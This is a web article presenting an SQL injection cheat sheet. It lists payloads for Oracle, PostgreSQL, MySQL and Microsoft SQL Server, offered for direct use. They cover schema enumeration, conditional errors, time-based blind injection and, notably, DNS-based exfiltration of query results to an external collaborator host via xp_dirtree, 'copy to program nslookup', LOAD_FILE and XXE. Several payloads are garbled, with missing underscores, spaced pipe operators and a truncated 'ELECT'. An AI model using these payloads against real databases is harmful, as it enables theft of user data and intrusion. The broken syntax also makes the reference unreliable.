SQL Injection Cheat Sheet

List of content you will read in this article:

An Introduction to SQL Injection Cheat Sheet

SQL is short for Structured Query Language and is used to communicate with a database. In 1986 and 1987, it became the standard of the ANSI and ISO and has been widely used. Throughout this article, we will teach you about SQL injection and the different ways it can be performed, aka, SQL injection cheat sheet. Keep reading to find out more.

What is SQL Injection?

We talked about how SQL has become the standard for communicating with databases. But the same language can be used to attack the same databases, which is called SQL injection (SQLi). In other words, SQL injection is a security weakness that attackers use to interfere with an application’s queries to its database.

Why would anyone want access to these queries? The answer is pretty simple. Every piece of data that the app has access to, including all users’ data, can be accessed with an SQL injection. Attackers can use these pieces of information to make changes to the app’s content. They might even sell the user data to third parties for several reasons. And if you’re not careful enough, the attacker could also target your back-end infrastructure. But as for the methods for SQL injections, the next section will teach you every method in detail. Keep reading to find out more.

SQL Injection Methods

Now for the part you’ve been waiting for, the SQL injection cheat sheet. You can use the methods below in different situations, depending on what you need to do. Let’s have a look.

DNS lookup

Users can use this method to make the database perform a DNS lookup to external domains. The main requirement is generating a Burp Collaborator subdomain to use. Further on in your attack, you must poll said collaborator server to ensure that your DNS lookup has succeeded.

MySQL

This technique works only on Windows.

LOAD_FILE('\BURPCOLLABORATORSUBDOMAIN\a')

SELECT INTO OUTFILE '\BURP-COLLABORATOR-SUBDOMAIN\a'

PostgreSQL

copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'

Microsoft

exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'

Oracle

SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual

DNS lookup using Data Exfiltration

This method makes the database do a DNS lookup to the external domain with the injected query’s results. The main requirement is generating a Burp Collaborator subdomain to use. Further on in your attack, you must poll said collaborator server to get the details of the DNS interactions.

PostgreSQL

Replace function f() returns void as $$

declare c text;

declare p text;

begin

SELECT p (SELECT-YOUR-QUERY-HERE);

c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURPCOLLABORATORSUBDOMAIN''';

execute c;

END;

$$ language plpgsql security definer;

SELECT f();

MySQL

This technique works only on Windows.

SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'

Microsoft

declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')

Oracle

SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual

String concatenation

Use this method to make a single string by concatenating together multiple strings.

PostgreSQL

'foo' | | 'bar'

Microsoft

'foo'+'bar'

MySQL

CONCAT('foo','bar')

Oracle

'foo' | | 'bar'

Substring

This is used to extract one part of the string. Said part should have a specific offset and a specific length, with the offset index being 1-based.

Oracle

SUBSTR('foobar', 4, 2)

PostgreSQL

SUBSTRING('foobar', 4, 2)

MySQL

SUBSTRING('foobar', 4, 2)

Microsoft

SUBSTRING('foobar', 4, 2)

Comments

This removes the part of the query that follows your input after you truncate the query.

Oracle

--comment

PostgreSQL

--comment

/*comment*/

MySQL

#comment

-- comment

/*comment*/

Microsoft

--comment

/*comment*/

Database version

This is used when you want to find out the type and version of the database. You can use this information to formulate complex attacks.

Oracle

SELECT banner FROM v$version

SELECT version FROM v$instance

PostgreSQL

SELECT version()

MySQL

SELECT @@version

Microsoft

SELECT @@version

Database content

This is used to collect the tables in the database and everything else that these tables contain.

Oracle

ELECT * FROM all_tables

SELECT * FROM all_tab_columns WHERE table_name = 'TABLENAME'

PostgreSQL

SELECT * FROM informationschematables

SELECT * FROM informationschemacolumns WHERE tablename = 'TABLENAME'

MySQL

SELECT * FROM informationschematables

SELECT * FROM informationschemacolumns WHERE tablename = 'TABLENAME'

Microsoft

SELECT * FROM informationschematables

SELECT * FROM informationschemacolumns WHERE tablename = 'TABLENAME'

Conditional errors

This is used to test single Boolean conditions. Also, it can trigger database errors when the condition turns out true.

Oracle

SELECT CASE WHEN (YOURCONDITION) THEN TOCHAR(1/0) ELSE NULL END FROM dual

PostgreSQL

1 = (SELECT CASE WHEN (YOURCONDITION) THEN CAST(1/0 AS INTEGER) ELSE NULL END)

MySQL

SELECT IF(YOURCONDITION,(SELECT tablename FROM informationschematables),'a')

Microsoft

SELECT CASE WHEN (YOURCONDITION) THEN 1/0 ELSE NULL END

Batched queries

If you want to query multiple databases at once, use batched queries. An important thing to remember is that while one of your queries is executed, your results will not return to the app. This is why users mostly use batched queries for blind vulnerabilities.

Oracle

NOT SUPPORTED BY ORACLE.

PostgreSQL

QUERY-1-HERE; QUERY-2-HERE

MySQL

QUERY-1-HERE; QUERY-2-HERE

Microsoft

QUERY-1-HERE; QUERY-2-HERE

Time delays

Time delays are used after queries are processed and done. The lines below will trigger a ten-second time delay. Change the “10” to any number of seconds you want the delay to last.

Oracle

dbms_pipe.receive_message(('a'),10)

PostgreSQL

SELECT pg_sleep(10)

MySQL

SELECT SLEEP(10)

Microsoft

WAITFOR DELAY '0:0:10'

Conditional time delays

Similar to conditional errors, this is used to test single Boolean conditions. The difference is conditional time delays will trigger time delays if the condition is true.

Oracle

SELECT CASE WHEN (YOURCONDITION) THEN 'a'||dbmspipe.receivemessage(('a'),10) ELSE NULL END

PostgreSQL

SELECT CASE WHEN (YOURCONDITION) THEN pg_sleep(10) ELSE pg_sleep(0) END

MySQL

SELECT IF(YOURCONDITION,SLEEP(10),'a')

Microsoft

IF (YOURCONDITION) WAITFOR DELAY '0:0:10'

Bullet points for social media.

• SQL is short for Structured Query Language and is used to communicate with a database.
• SQL injection is a security weakness that attackers use to interfere with an application’s queries to its database.
• You can perform a variety of tasks with SQLi. You can do everything from simply gaining access to the database to gathering all its content or even performing a DNS lookup.

  The tasks you can perform are as listed below:

• String concatenation
• Substring
• Comments
• Database version
• Database contents
• Conditional errors
• Batched queries
• Time delays
• Conditional time delays
• DNS lookup (with or without data exfiltration)

People also read: 

• XPath Injection Attacks and Prevention
• What is MySQL Error 1064?
• Your PHP installation appears to be missing the MySQL extension which is required by WordPress
• What Is Default MySQL Port Number?